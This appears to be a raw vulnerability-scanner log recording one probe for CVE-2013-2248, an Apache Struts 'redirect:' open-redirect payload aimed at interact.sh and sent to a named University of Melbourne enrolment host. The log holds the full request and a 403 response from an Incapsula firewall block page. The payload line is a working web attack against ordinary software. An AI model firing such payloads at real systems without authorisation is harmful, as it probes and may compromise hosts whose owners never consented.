[CVE-2013-2248] Dumped HTTP request for https://enrolments.hildas.unimelb.edu.au/index.action?redirect:http://www.interact.sh/


GET /index.action?redirect:http://www.interact.sh/ HTTP/1.1
Host: enrolments.hildas.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2013-2248] Dumped HTTP response https://enrolments.hildas.unimelb.edu.au/index.action?redirect:http://www.interact.sh/

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 830
Cache-Control: no-cache, no-store
Content-Type: text/html
Set-Cookie: visid_incap_3211538=JU7Vv21kRCuQtyQN35Yzrgxyk2gAAAAAQUIPAAAAAADKsaoVXGtnN5Brpv5R9wvH; expires=Thu, 06 Aug 2026 07:06:48 GMT; HttpOnly; path=/; Domain=.hildas.unimelb.edu.au
Set-Cookie: incap_ses_237_3211538=Bd5hHenBgzN96barov5JAwxyk2gAAAAAWEgirCrvtFtCekAiZ3Ux5Q==; path=/; Domain=.hildas.unimelb.edu.au
X-Iinfo: 1-1018974-0 0NNN RT(1754493453269 8) q(0 -1 -1 -1) r(0 -1) B15(3,502151,0) U18

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><script src="/Front-Night-supt-I-keepe-mans-his-rauing-it-of-N" async></script></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=23&xinfo=1-1018974-0%200NNN%20RT%281754493453269%208%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29%20B15%283%2c502151%2c0%29%20U18&incident_id=237000430032587158-11528181864270529&edet=15&cinfo=03000000&rpinfo=0&mth=GET" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 237000430032587158-11528181864270529</iframe></body></html>
